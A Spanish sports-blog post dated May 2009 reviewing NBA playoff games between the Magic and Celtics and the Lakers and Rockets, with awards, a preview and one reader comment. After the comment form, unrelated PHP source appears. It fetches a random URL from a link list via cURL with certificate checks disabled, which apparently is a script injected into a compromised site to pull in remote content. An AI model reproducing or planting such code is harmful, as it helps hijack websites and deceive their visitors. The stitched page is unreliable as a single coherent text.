Playoffs (08/05/2009): Sanciones inocuas

09 de May de 2009 por TheDeerHunter

Esperábamos ansiosos dos choques de máxima rivalidad, a cara de perro, tras los incidentes que tuvieron lugar hace dos días en las respectivas series con la consiguiente expulsión y sanción de Dereck Fisher por un lado y Rafer Alston por el otro. No era el día más indicado para dar alternativas pero las circunstancias lo exigían y la papeleta finalmente cayó sobre Jordan Farmar y Anthony Johnson respectivamente. Lo mejor que podemos decir de ambos es que no se notó en absoluto ausencia alguna y eso, tal y como están las cosas, es decir mucho.

En Orlando, los Magic se marcaron un partido serio desde el primer minuto, desde la seguridad que aporta la imponente figura de Dwight Howard en la zona y que, sin Garnett, ahora mismo no tiene parangón en el bando contrario. En esta tesitura, resulta impepinable marcar la diferencia en el tiro y esto, con todo lo bueno que son los Celtics, en ocasiones es posible y en otras no. Anoche no tocaba. Y es que, si Orlando suele ser un equipo que lanza mucho pero sin extraordinarios porcentajes anoche fue al contrario. Lewis y Turkoglu 17 de 29 y 5 de 10 en triples; Anthony Johnson y Tyronne Lue 7 de 9 y 2 de 2 y para colmo recuperan a Courtney Lee que, con máscara incluída, se marcó un partido completito.
Por el contrario el “big three” exterior de los verdes (sin incluir en él a House, claro) lanzaron mucho  pero rozando el 30% de acierto. Y lo peor es que con la tralla que llevan estos, conforme avance la eliminatoria va a ser más fácil que se repita lo primero a que se corrija lo segundo. Sobre todo con “Supermán” plantado en medio de la zona.

En Houston se esperaba una especie de hoguera preparada para consumir las vanidades angelinas. Artest  o Scola tenían apuntadas un par de matrículas que querían seguir de cerca y realmente, eso es lo que hicieron durante todo el partido. Perseguir una matrícula que no lograron alcanzar.

Desde el salto inicial los Lakers impusieron un ritmo de juego que los Rockets difícilmente van a poder aguantar. El caso es que resulta curioso como, en medio de tantas distracciones, los de Adelman han mordido alegremente el anzuelo y aunque aparentemente la serie está en su terreno de brega y pelea, la realidad es que la media de anotación es de más de 200 puntos por encuentro. No hace falta ser muy listo para saber a quién beneficia el intercambio de golpes. La consecuencia más evidente es que los locales perdieron 17 balones por 6 de los amarillos y la frustración de un duelo que se veía no podían ganar. Mejor autoexpulsarse como hizo Artest en una acción absurda contra Gasol… y si por una de aquellas lo sancionan la serie estará literalmente muerta. De momento Yao es duda para el próximo. Por lesión, me temo.

PREMIOS TJNBA

MVP: Anoche Lebron, hoy Kobe con 33 puntos, 6 rebotes y 3 asistencias. El triplaco para cerrar el tercer cuarto es alucinante… evoca algo no demasiado lejano (¿pique entre los dos MVPs?). Faltaría Wade para resumir lo que ha sido la temporada en esta categoría.

El Rookie: Anoche jugó Courtney Lee y lo hizo bien… Así que para él, los días que así sea.

La Sorpresa: Farmar jugando minutos, sensacional. Rápido, agresivo… nada acertado en el tiro exterior, pero por algo se empieza. Con la que le estaba cayendo al pobre.

La decepción: Ray Allen 3 de 13… ¡¡Qué dolor en la vista!!!El próximo partido seguramente aparecerá en el MVP, que no os extrañe nada…

El mayor esfuerzo en vano: Para Artest… que quiso romperle la crisma a Gasol y, por lo visto no lo consiguió. Ya tendrá más oportunidades…

RAZONES PARA TRASNOCHAR

Esta noche se juega el tercer partido de dos eliminatorias que pueden quedar vistas para sentencia. Por un lado Lebron y los suyos buscarán el séptimo partido consecutivo ganado en Playoffs frente a los Hawks en el Philips Arena y por el otro los Nuggets pueden dar el golpe definitivo a los Mavs en su propia casa y meter aún más miedo a sus rivales futuros. Cualquiera de los 2 partidos merece perder unas horas de sueño.

Comenta

Un comentario a esta entrada

  1. Jabho dice:
    #1

    Como dices no tuvimos ninguna opción contra Howard. Cuando en el primer cuarto te plantan 4 chapas en otras tantas penetraciones la cosa es que tu te acongojas, jeje, en penetrar y entonces la defensa tiene más fácil cerrar el grifo en el tiro… Pudo haber partido porque con la 4ª de Howard nos pusimos a 7 al principio del último cuarto, pero no pudo ser… En fin. A ver el 4º. Si ganan los Magic caso cerrado, si gana Boston hay vida.

    El Lakers vi la mitad del final y bien los Lakers, aunque les cuesta matar partidos y cualquier día se llevan más sustos de los esperados. Lo de Artest no fue ni mucho menos para tanto. No debería haber sanción. Yao se fue cojeando creo que de la rodilla…. como no esté bien la cosa está hecha. Y si está bien puede que tb, la verdad

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>